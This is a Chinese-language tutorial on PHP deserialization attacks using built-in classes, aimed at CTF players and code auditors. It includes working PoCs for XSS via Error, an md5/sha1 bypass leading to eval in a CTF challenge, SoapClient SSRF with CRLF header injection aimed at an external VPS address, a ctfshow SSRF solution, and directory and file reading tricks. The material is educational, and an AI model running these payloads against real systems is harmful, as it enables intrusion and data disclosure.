深入了解PHP反序列化原生類

本篇文章為大家帶來了關於PHP的相關知識，其中主要介紹了關於反序列化原生類別的利用，如果在程式碼審計或ctf中，有反序列化的功能點，但是卻不能構造出完整的pop鏈，那這時我們該如何破局呢，下面一起來看一下，希望對大家有幫助。

推薦學習：《PHP影片教學》

淺析php反序列化原生類別的利用

如果在程式碼審計或ctf中，有反序列化的功能點，但是卻不能構造出完整的pop鏈，那這時我們該如何破局呢？我們可以嘗試從php原生類別下手，php有些原生類別中內建一些魔術方法，如果我們巧妙建構可控參數，觸發並利用其內建魔術方法，就有可能達到一些我們想要的目的。

一、常見魔術方法

__wakeup() //执行unserialize()时，先会调用这个函数
__sleep() //执行serialize()时，先会调用这个函数
__destruct() //对象被销毁时触发
__call() //在对象上下文中调用不可访问的方法时触发
__callStatic() //在静态上下文中调用不可访问的方法时触发
__get() //用于从不可访问的属性读取数据或者不存在这个键都会调用此方法
__set() //用于将数据写入不可访问的属性
__isset() //在不可访问的属性上调用isset()或empty()触发
__unset() //在不可访问的属性上使用unset()时触发
__toString() //把对象当作字符串使用时触发
__invoke() //当尝试将对象调用为函数时触发

二、原生類別中的魔術方法

我們採用下面腳本遍歷一下所有原生類別中的魔術方法

<?php $classes = get_declared_classes();foreach ($classes as $class) {
    $methods = get_class_methods($class);
    foreach ($methods as $method) {
        if (in_array($method, array(
            &#39;__destruct&#39;,
            &#39;__toString&#39;,
            &#39;__wakeup&#39;,
            &#39;__call&#39;,
            &#39;__callStatic&#39;,
            &#39;__get&#39;,
            &#39;__set&#39;,
            &#39;__isset&#39;,
            &#39;__unset&#39;,
            &#39;__invoke&#39;,
            &#39;__set_state&#39;
        ))) {
            print $class . &#39;::&#39; . $method . "\n";
        }
    }}

三、一些常見原生類別的利用

Error/Exception

Error是所有PHP內部錯誤類別的基底類別。 (PHP 7, 8)

**Error::__toString ** error 的字串表達

傳回 Error 的 string表達形式。

Exception是所有使用者層級例外的基底類別。 (PHP 5, 7, 8)

**Exception::__toString ** 將例外物件轉換為字串

回傳轉換為字串（string）類型的例外。

類別屬性

• message 錯誤訊息內容

• code 錯誤代碼

• file 拋出錯誤的檔名

• line 拋出錯誤的行數

XSS

__toString方法會傳回錯誤或例外的字串形式，其中包含我們輸入的參數，如果我們建構一串xss程式碼，結合echo渲染，將觸發反射形xss漏洞

範例：

<?php $a = unserialize($_GET[&#39;a&#39;]);echo $a;

POC：

<?php $a = new Error("<script>alert('xss')");$b = serialize($a);echo urlencode($b);

#hash繞過

##先看一題

[2020 極客大挑戰]Greatphp

<?phperror_reporting (0);class SYCLOVER {
    public $syc;
    public $lover;
    public function __wakeup(){
        if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($this->syc)=== sha1($this->lover)) ){
           if(!preg_match("/\syc, $match)){
               eval($this->syc);
           } else {
               die("Try Hard !!");
           }

        }
    }}if (isset($_GET['great'])){
    unserialize($_GET['great']);} else {
    highlight_file(__FILE__);}

#需要繞過兩個hash強比較，且最終需要建構eval程式碼執行

##顯然正常方法是行不通的，而透過原生類別可進行繞過

同樣，當md5()和sha1()函數處理物件時，會自動呼叫__tostring方法

先簡單看一下其輸出

<?php $a=new Error("payload",1);$b=new Error("payload",2);$c=new Exception("payload",3);
$d=new Exception("payload",4);
echo $a."<br>";
echo $b."<br>";
echo $c."<br>";
echo $d;

可以發現，這兩個原生類別回傳的資訊除了行號一模一樣，利用這點，我們可以嘗試進行hash函數的繞過，需要注意的是，必須將兩個傳入的物件放到同一行

因此我們可以進行簡單的測試,發現使用此方法可以繞過hash強(弱)函數比較

<?php $a = new Error("payload",1);$b = new Error("payload",2);if ($a!=$b){
    echo &#39;$a不等于$b&#39;."\n";}if (md5($a)===md5($b)){
    echo "md5值相等\n";}if (sha1($a)===sha1($b)){
    echo "sha1值相等";}

根據這些知識點，我們可以輕鬆建構payload

  <?phpclass  SYCLOVER {
	public $syc;
	public $lover;
	public function __wakeup(){
		if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($this->syc)=== sha1($this->lover)) ){
		   if(!preg_match("/\syc, $match)){
			   eval($this->syc);
		   } else {
			   die("Try Hard !!");
		   }
		   
		}
	}}$str = "?>=include~".urldecode("%D0%99%93%9E%98")."?>";//两次取反绕过正则$a=new Error($str,1);
	$b=new Error($str,2);
	$c = new SYCLOVER();$c->syc = $a;$c->lover = $b;
	echo(urlencode(serialize($c)));?>

SoapClient

SoapClient

是一個專門用來存取web服務的類，可以提供一個基於SOAP協定存取Web服務的PHP 用戶端，可以建立soap資料封包，與wsdl介面進行互動soap擴充模組預設關閉，使用時需手動開啟

#SoapClient::__call

—呼叫SOAP 函數(PHP 5, 7, 8)通常，SOAP 函數可以作為SoapClient物件的方法呼叫

#SSRF

建構子：

public SoapClient :: SoapClient(mixed $wsdl [，array $options ])
第一个参数是用来指明是否是wsdl模式，如果为`null`，那就是非wsdl模式。
第二个参数为一个数组，如果在wsdl模式下，此参数可选；如果在非wsdl模式下，则必须设置location和uri选项，其中location是要将请求发送到的SOAP服务器的URL，而uri 是SOAP服务的目标命名空间。

什麼是soap

SOAP 是基于 XML 的简易协议，是用在分散或分布的环境中交换信息的简单的协议，可使应用程序在 HTTP 之上进行信息交换
SOAP是webService三要素（SOAP、WSDL、UDDI）之一：WSDL 用来描述如何访问具体的接口， UDDI用来管理，分发，查询webService ，SOAP（简单对象访问协议）是连接或Web服务或客户端和Web服务之间的接口。
其采用HTTP作为底层通讯协议，XML作为数据传送的格式。

我們建構一個利用payload，第一個參數為NULL，第二個參數的location設定為vps位址

<?php $a = new SoapClient(null, array(
&#39;location&#39; => 'http://47.102.146.95:2333', 
'uri' =>'uri',
'user_agent'=>'111111'));
$b = serialize($a);
echo $b;
$c = unserialize($b);
$c->a();

監聽vps的2333端口，如下圖所示成功觸發SSRF，vps收到了請求訊息

且可以看到SOAPAction和user_agent都可控

#本地測試時發現，當使用此內建類別(即soap協定)請求存在服務的連接埠時，會立即報錯，而去存取不存在服務(未佔用)的連接埠時，會等待一段時間報錯，可以以此進行內網資產的偵測。

如果配合CRLF漏洞，還可以透過 SoapClient 來控制其他參數或post傳送資料。例如:HTTP協定去攻擊Redis

CRLF知識擴充

HTTP报文的结构：状态行和首部中的每行以CRLF结束，首部与主体之间由一空行分隔。
CRLF注入漏洞，是因为Web应用没有对用户输入做严格验证，导致攻击者可以输入一些恶意字符。
攻击者一旦向请求行或首部中的字段注入恶意的CRLF(\r\n)，就能注入一些首部字段或报文主体，并在响应中输出。

透過結合CRLF，我們利用SoapClient CRLF便可以乾更多的事情，例如插入自訂Cookie，

<?php $a = new SoapClient(null, array(
    &#39;location&#39; => 'http://47.102.146.95:2333',
    'uri' =>'uri',
    'user_agent'=>"111111\r\nCookie: PHPSESSION=dasdasd564d6as4d6a"));
    $b = serialize($a);echo $b;$c = unserialize($b);$c->a();

发送POST的数据包，这里需要将Content-Type设置为application/x-www-form-urlencoded，我们可以通过添加两个\r\n来将原来的Content-Type挤下去，自定义一个新的Content-Type

<?php $a = new SoapClient(null, array(
    &#39;location&#39; => 'http://47.102.146.95:2333',
    'uri' =>'uri',
    'user_agent'=>"111111\r\nContent-Type: application/x-www-form-urlencoded\r\nX-Forwarded-For: 127.0.0.1\r\nCookie: PHPSESSID=3stu05dr969ogmprk28drnju93\r\nContent-Length: 10\r\n\r\npostdata"));
    $b = serialize($a);echo $b;$c = unserialize($b);$c->a();

看一道ctfshow上的题，完美利用上述知识点

$xff = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
array_pop($xff);
$ip = array_pop($xff); //获取xff头


if($ip!=='127.0.0.1'){
    die('error');
}else{
    $token = $_POST['token'];
    if($token=='ctfshow'){
        file_put_contents('flag.txt',$flag);
    }
}

poc：

<?php $target = &#39;http://127.0.0.1/flag.php&#39;;
$post_string = &#39;token=ctfshow&#39;;
$b = new SoapClient(null,array(&#39;location&#39; => $target,'user_agent'=>'wupco^^X-Forwarded-For:127.0.0.1,127.0.0.1^^Content-Type: application/x-www-form-urlencoded'.'^^Content-Length: '.(string)strlen($post_string).'^^^^'.$post_string,'uri'=> "ssrf"));
$a = serialize($b);
$a = str_replace('^^',"\r\n",$a);
echo urlencode($a);
?>

DirectoryIterator/FilesystemIterator

DirectoryIterator类提供了一个简单的接口来查看文件系统目录的内容。

DirectoryIterator::__toString 获取字符串形式的文件名 （PHP 5,7,8）

目录遍历

使用此内置类的__toString方法结合glob或file协议，即可实现目录遍历

例如:

<?php $a = new DirectoryIterator("glob:///*");
foreach ($a as $b){
    echo $b.&#39;<br>';
}

FilesystemIterator继承于DirectoryIterator，两者作用和用法基本相同，区别为FilesystemIterator会显示文件的完整路径，而DirectoryIterator只显示文件名

因为可以配合使用glob伪协议(查找匹配的文件路径模式)，所以可以绕过open_basedir的限制

在php4.3以后使用了zend_class_unserialize_deny来禁止一些类的反序列化，很不幸的是这两个原生类都在禁止名单当中

SplFileObject

SplFileObject 类为单个文件的信息提供了一个面向对象的高级接口

(PHP 5 >= 5.1.2, PHP 7, PHP 8)

文件读取

SplFileObject::__toString — 以字符串形式返回文件的路径

<?phphighlight_file (__file__);$a = new SplFileObject("./flag.txt");echo $a;/*foreach($context as $f){
    echo($a);
}*/

如果没有遍历的话只能读取第一行，且受到open_basedir影响

SimpleXMLElement

解析XML 文档中的元素。 （PHP 5、PHP 7、PHP 8）

SimpleXMLElement::__construct — 创建一个新的 SimpleXMLElement 对象

XXE

我们查看一下其参数：

根据官方文档，发现当第三个参数为True时，即可实现远程xml文件载入，第二个参数的常量值设置为2即可。

利用可参考赛题：[SUCTF 2018]Homework

ReflectionMethod

获取注释内容

(PHP 5 >= 5.1.0, PHP 7, PHP 8)

ReflectionFunctionAbstract::getDocComment — 获取注释内容
由该原生类中的getDocComment方法可以访问到注释的内容

同时可利用的原生类还有ZipArchive– 删除文件等等，不在叙述

推荐学习：《PHP视频教程》

以上是深入了解PHP反序列化原生類的詳細內容。更多資訊請關注PHP中文網其他相關文章！